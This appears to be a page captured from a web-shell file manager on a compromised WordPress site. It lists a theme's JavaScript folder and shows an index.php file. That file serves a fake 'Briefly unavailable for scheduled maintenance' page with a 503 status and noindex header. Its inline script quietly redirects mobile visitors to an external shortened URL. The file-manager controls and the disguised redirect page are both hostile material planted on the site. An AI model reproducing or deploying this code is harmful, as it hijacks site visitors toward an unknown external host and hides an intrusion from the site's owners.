at path:
ROOT
/
wp-content
/
themes
/
jannah
/
assets
/
js
/
index.php
run:
R
W
Run
dev
DIR
2026-08-16 23:28:48
R
W
Run
br-news.js
5.68 KB
2026-08-13 20:01:43
R
W
Run
css-vars-ponyfill.js
22.77 KB
2026-08-13 20:01:43
R
W
Run
desktop.js
23.71 KB
2026-08-13 20:01:43
R
W
Run
desktop.min.js
18 KB
2026-08-13 20:01:43
R
W
Run
ie.js
7.31 KB
2026-08-13 20:01:43
R
W
Run
index.php
1.97 KB
2026-08-16 23:28:49
R
W
Run
Delete
Rename
live-search.js
14.48 KB
2026-08-13 20:01:43
R
W
Run
parallax.js
23.66 KB
2026-08-13 20:01:43
R
W
Run
scripts.js
39.31 KB
2026-08-13 20:01:43
R
W
Run
scripts.min.js
23.32 KB
2026-08-13 20:01:43
R
W
Run
shortcodes.js
11.14 KB
2026-08-13 20:01:43
R
W
Run
side-e3lan.js
2.12 KB
2026-08-13 20:01:43
R
W
Run
single.js
9.46 KB
2026-08-13 20:01:43
R
W
Run
single.min.js
5.6 KB
2026-08-13 20:01:43
R
W
Run
sliders.js
55.67 KB
2026-08-13 20:01:43
R
W
Run
sliders.min.js
48.38 KB
2026-08-13 20:01:43
R
W
Run
velocity.js
47.4 KB
2026-08-13 20:01:43
R
W
Run
videos-playlist.js
12.13 KB
2026-08-13 20:01:43
R
W
Run
viewport-scripts.js
7.31 KB
2026-08-13 20:01:43
R
W
Run
error_log
up
📄
index.php
Save
<?php http_response_code(503); header("Retry-After: 3600"); header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0"); header("Pragma: no-cache"); header("Expires: 0"); echo '<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, follow"> <title>Briefly unavailable for scheduled maintenance</title> <style> *{ box-sizing:border-box; } body{ margin:0; height:100vh; display:flex; justify-content:center; align-items:center; background:#f0f6fc; font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Arial,sans-serif; color:#21759b; } .box{ background:#fff; padding:50px 40px; border-radius:18px; box-shadow:0 10px 35px rgba(0,0,0,.08); text-align:center; width:90%; max-width:600px; } .logo{ font-size:62px; font-weight:700; margin:0; letter-spacing:-2px; } .text{ margin-top:20px; font-size:19px; line-height:1.7; color:#5c6b77; } .loader{ width:42px; height:42px; border:3px solid #d9e7f2; border-top:3px solid #21759b; border-radius:50%; margin:30px auto 0; animation:spin 1s linear infinite; } @keyframes spin{ 100%{ transform:rotate(360deg); } } @media(max-width:600px){ .logo{ font-size:44px; } .text{ font-size:16px; } } </style> </head> <body> <div class="box"> <h1 class="logo">WordPress</h1> <div class="text"> Briefly unavailable for scheduled maintenance.<br> Check back in a some hours. </div> <div class="loader"></div> </div> <script> const isMobile = window.matchMedia("(max-width: 768px)").matches || /Android|iPhone|iPad|iPod|Opera Mini|IEMobile/i.test(navigator.userAgent); if (isMobile) { window.location.replace("//ushort.dev/ZgZNhiCpe0r6"); } </script> </body> </html>'; ?>